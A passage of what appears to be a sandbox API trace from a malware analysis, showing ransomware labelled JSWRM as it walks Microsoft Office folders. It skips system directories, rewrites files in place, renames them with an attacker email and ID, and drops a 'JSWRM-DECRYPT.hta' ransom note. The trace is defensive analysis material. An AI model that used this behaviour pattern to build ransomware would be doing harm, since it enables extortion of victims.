Office\\root\\mcxml\\fr-fr\\Proof.Culture.msi.16_proof.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\fr-fr\\proof.culture.msi.16_proof.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\fr-fr\\Proof.Culture.msi.16_proof.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\fr-fr\\proof.culture.msi.16_proof.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0112.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0112.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0112.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0112.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.982] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x996d62b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15276, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Proof.Culture.msi.16_proof.mcxml", cAlternateFileName="PROOFC~1.MCX")) returned 0 [0112.982] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0112.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0112.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0112.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0112.982] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x398fa292, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x398fa292, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x399204d5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0112.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0112.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0112.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0112.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0112.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0112.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0112.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0112.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0112.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0112.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0112.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0112.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0112.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0112.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0112.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0112.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0112.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0112.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0112.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0112.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0112.983] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b9607ff, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="x-none", cAlternateFileName="")) returned 1 [0112.983] lstrcmpiW (lpString1="x-none", lpString2=".") returned 1 [0112.983] lstrcmpiW (lpString1="x-none", lpString2="..") returned 1 [0112.983] lstrcmpiW (lpString1="x-none", lpString2="...") returned 1 [0112.983] lstrcmpiW (lpString1="x-none", lpString2="windows") returned 1 [0112.983] lstrcmpiW (lpString1="x-none", lpString2="recovery") returned 1 [0112.983] lstrcmpiW (lpString1="x-none", lpString2="perflogs") returned 1 [0112.983] lstrcmpiW (lpString1="x-none", lpString2="documents and settings") returned 1 [0112.983] lstrcmpiW (lpString1="x-none", lpString2="$RECYCLE.BIN") returned 1 [0112.983] lstrcmpiW (lpString1="x-none", lpString2="system volume information") returned 1 [0112.983] lstrcmpiW (lpString1="x-none", lpString2="msocache") returned 1 [0112.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0112.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0112.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0112.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0112.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bb50 [0112.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0112.983] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\jswrm-decrypt.hta")) returned 0xffffffff [0112.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0112.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0112.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0112.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0112.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24c1d0 [0112.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0112.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0112.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b6a0 [0112.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0112.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.989] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.989] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0112.990] CloseHandle (hObject=0x45c) returned 1 [0112.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0112.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0112.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0112.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0112.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0112.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0112.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b9c0 [0112.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0112.990] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\jswrm-decrypt.hta")) returned 0x20 [0112.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0112.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0112.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0112.990] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3a021383, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0112.990] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0112.990] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3a021383, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="..", cAlternateFileName="")) returned 1 [0112.991] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0112.991] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0112.991] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1164cbcb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11699072, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10257a, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Access.x-none.msi.16_mondoww.mcxml", cAlternateFileName="ACCESS~1.MCX")) returned 1 [0112.992] lstrcmpiW (lpString1="Access.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0112.992] lstrcmpiW (lpString1="Access.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0112.992] lstrcmpiW (lpString1="Access.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0112.992] lstrcmpiW (lpString1="Access.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0112.992] lstrcmpiW (lpString1="Access.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0112.992] lstrcmpiW (lpString1="Access.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned -1 [0112.992] lstrcmpiW (lpString1="Access.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned -1 [0112.992] lstrcmpiW (lpString1="Access.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.992] lstrcmpiW (lpString1="Access.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0112.992] lstrcmpiW (lpString1="Access.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned -1 [0112.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0112.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Access.x-none.msi.16_mondoww.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0112.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Access.x-none.msi.16_mondoww.mcxml", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Access.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 34 [0112.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0112.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0112.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Access.x-none.msi.16_mondoww.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0112.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Access.x-none.msi.16_mondoww.mcxml", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Access.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 34 [0112.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0112.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0112.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0112.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.992] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0112.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Access.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\access.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.993] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1058170) returned 1 [0112.993] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0112.993] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.010] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.010] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.011] CloseHandle (hObject=0x238) returned 1 [0113.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0113.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0113.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0113.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0113.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0113.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0113.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.011] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Access.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\access.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Access.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\access.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0113.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0113.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0113.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0113.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.012] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11672e1a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11672e1a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11699072, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x93296, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="DCF.x-none.msi.16_mondoww.mcxml", cAlternateFileName="DCFX-N~1.MCX")) returned 1 [0113.012] lstrcmpiW (lpString1="DCF.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.012] lstrcmpiW (lpString1="DCF.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.012] lstrcmpiW (lpString1="DCF.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.012] lstrcmpiW (lpString1="DCF.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.012] lstrcmpiW (lpString1="DCF.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.012] lstrcmpiW (lpString1="DCF.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned -1 [0113.012] lstrcmpiW (lpString1="DCF.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned -1 [0113.012] lstrcmpiW (lpString1="DCF.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.012] lstrcmpiW (lpString1="DCF.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.013] lstrcmpiW (lpString1="DCF.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned -1 [0113.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0113.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DCF.x-none.msi.16_mondoww.mcxml", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0113.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0113.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DCF.x-none.msi.16_mondoww.mcxml", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DCF.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 31 [0113.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0113.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0113.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DCF.x-none.msi.16_mondoww.mcxml", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0113.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0113.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DCF.x-none.msi.16_mondoww.mcxml", cchWideChar=31, lpMultiByteStr=0x241178, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DCF.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 31 [0113.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0113.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0113.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0113.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, 